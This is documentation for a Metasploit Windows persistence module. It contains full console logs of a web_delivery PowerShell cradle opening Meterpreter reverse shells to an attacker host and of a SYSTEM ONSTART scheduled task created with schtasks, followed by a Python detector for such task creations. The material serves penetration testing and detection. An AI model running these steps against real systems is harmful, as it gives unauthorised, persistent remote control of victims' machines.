## Vulnerable Application

This module establishes persistence by creating a scheduled task that runs a payload.

## Verification Steps

1. Get a session on the target with admin/SYSTEM privileges
2. `use exploit/windows/persistence/task_scheduler`
3. `set payload <payload>`
4. `set lport <port>`
5. `set lhost <ip>`
6. `exploit`

## Options

### PAYLOAD_NAME

Name of the payload file to write. Defaults to a random string.

### TASK_NAME

Name of the scheduled task. Defaults to a random string.

## Advanced Options

### ScheduleType

Schedule frequency for the newly created task. Options are: `MINUTE`, `HOURLY`, `DAILY`, `WEEKLY`, `MONTHLY`, `ONCE`, `ONSTART`, `ONLOGON`, `ONIDLE`.

### ScheduleModifier

Schedule frequency modifier that defines the amount of `ScheduleType`: the number of minutes/hours/days/weeks/months, depending on the `ScheduleType` value. When the `ONIDLE` type is used, this is the number of minutes the computer must be idle before the task starts. This value is not used with the `ONCE`, `ONSTART` and `ONLOGON` types.

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4449
[*] Using URL: http://2.2.2.2:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e <base64-encoded command omitted>
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Powershell command length: 3659
[*] 1.1.1.1 web_delivery - Delivering Payload (3659 bytes)
[*] Sending stage (230982 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4449 -> 1.1.1.1:49934) at 2025-10-26 16:11:31 -0400
```

Session info

```
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```

Persistence

```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/task_scheduler
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/task_scheduler) > set session 1
session => 1
msf exploit(windows/persistence/task_scheduler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/task_scheduler) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(windows/persistence/task_scheduler) >
[*] Running automatic check ("set AutoCheck false" to disable)
[*] [Task Scheduler] Trying to get SYSTEM privilege
[*] [Task Scheduler] Got SYSTEM privilege
[+] The target appears to be vulnerable. Likely exploitable
[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe
[*] Creating task: svuJIW
[*] [Task Scheduler] executing command: schtasks /create /tn "svuJIW" /tr "C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe" /sc ONSTART /ru SYSTEM /f
[*] Starting task: svuJIW
[*] [Task Scheduler] executing command: schtasks /run /tn svuJIW
[*] Sending stage (188998 bytes) to 1.1.1.1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:49935) at 2025-10-26 16:12:29 -0400
```

Cleanup

```
msf exploit(windows/persistence/task_scheduler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> execute -f cmd.exe -a "/c schtasks /delete /tn svuJIW /f"
Process 560 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> rm C:/Users/windows/AppData/Local/Temp/CLxSZIsj.exe
[-] stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter >
```
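From the defender's side, the `schtasks /create ... /sc ONSTART /ru SYSTEM /f` command the module logs above is exactly what lands in process-creation telemetry. The following is an added example, not code from this module or from Metasploit: it parses `schtasks /create` command lines and flags the combination the module produces (SYSTEM run-as, a boot/logon trigger, and a binary in a user-writable temp directory). The sample command lines, the `SUSPICIOUS_DIRS` list and the two-indicator threshold are constructed assumptions for the example.

```python
import re

# schtasks switch plus optional value: /tn "name", /sc ONSTART, /f.
# A value may not start with '/' so adjacent switches are not swallowed.
_SWITCH_RE = re.compile(r'/(?P<key>[a-zA-Z]+)(?:\s+(?P<val>"[^"]*"|[^\s/]\S*))?')
# Directories a low-privileged user can write to (constructed, non-exhaustive).
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
# Schedule types that re-run the payload after a reboot or logon.
BOOT_TRIGGERS = {"ONSTART", "ONLOGON"}

def parse_schtasks_create(cmdline):
    """Parse a 'schtasks /create' command line into a dict, or return None."""
    lowered = cmdline.lower()
    if "schtasks" not in lowered or "/create" not in lowered:
        return None
    opts = {m.group("key").lower(): (m.group("val") or "").strip('"')
            for m in _SWITCH_RE.finditer(cmdline)}
    return {"name": opts.get("tn", ""), "run": opts.get("tr", ""),
            "schedule": opts.get("sc", "").upper(), "run_as": opts.get("ru", "").upper(),
            "reasons": []}

def assess(task):
    """Attach the reasons that make a task creation look like persistence."""
    if task["run_as"] == "SYSTEM":
        task["reasons"].append("runs as SYSTEM")
    if task["schedule"] in BOOT_TRIGGERS:
        task["reasons"].append(f'{task["schedule"]} trigger re-runs the binary after reboot/logon')
    if any(d in task["run"].lower() for d in SUSPICIOUS_DIRS):
        task["reasons"].append("binary lives in a user-writable temp directory")
    return task

def scan(cmdlines):
    """Return parsed task creations that hit at least two indicators."""
    findings = []
    for cmd in cmdlines:
        task = parse_schtasks_create(cmd)
        if task is not None and len(assess(task)["reasons"]) >= 2:
            findings.append(task)
    return findings

# Constructed sample command lines; the first mirrors the module output above.
SAMPLE_CMDLINES = [
    'schtasks /create /tn "svuJIW" /tr "C:\\Users\\windows\\AppData\\Local\\Temp\\CLxSZIsj.exe" /sc ONSTART /ru SYSTEM /f',
    'schtasks /create /tn "Backup" /tr "C:\\Program Files\\Backup\\backup.exe" /sc DAILY /st 02:00',
    'schtasks /delete /tn svuJIW /f',
]

if __name__ == "__main__":
    for t in scan(SAMPLE_CMDLINES):
        print(f"[!] task {t['name']!r} -> {t['run']}: {'; '.join(t['reasons'])}")
```

Feed it the command-line field of Sysmon Event ID 1 or Security Event ID 4688 records; the `/sc` and `/ru` values map directly onto the module's `ScheduleType` option and its `SYSTEM` run-as.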